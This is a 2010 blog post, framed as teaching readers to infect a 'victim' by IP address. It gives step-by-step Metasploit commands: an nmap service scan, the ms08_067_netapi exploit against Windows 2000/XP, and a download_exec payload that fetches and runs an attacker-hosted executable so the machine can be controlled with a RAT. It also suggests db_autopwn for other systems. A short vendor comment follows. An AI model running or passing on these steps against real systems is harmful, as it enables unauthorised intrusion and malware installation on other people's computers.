Monday, September 13, 2010

Infecting Your Victom through IP



Many of the times I saw this question asked here & everywhere on the Blog that
“Is it possible to infect victim using his IP address?”

So, I am going to show you how to do it.


Requirements:


Nmap

Metasploit

First of all you need target ip of your victim.


Then open Metasploit Console & type db_create.

[Use: This’ll create or connect you to database.]

Once you do that type Nmap.

[Use: This’ll load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on victim’s computer.]
Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on victim’s computer.

Now it’s time to exploit victim’s machine.

Exploit depends on the OS, Ports, and Services running on victim’s computer.
So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-


Windows 2000 (all versions SP1, SP2, SP3, SP4)

Windows XP (all versions SP1, SP2, SP3)

Type show exploits

[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi

[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets

[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]
Then type show payloads
[Use: This’ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]
In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST

[Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL
http://www.xxxx.com/xxx.exe
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit

[Use: This will launch your exploit & your victim will be infected.]

You can now control you're victim with RAT.

So, any versions of Win 2000-XP can be exploited easily.
In case if you didn’t get this two OS’, immediately after Nmap scan
You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Good Luck!





.....................................................................................................................................................................................................
............................................................................................................................................................................................................

2 comments:

  1. A different version of Metasploit, called Metasploit Express, already includes nmap and has a great graphical user interface. You can read about Metasploit Express here:
    http://www.metasploit.com/express/

    Chris Kirsch from Rapid7

    ReplyDelete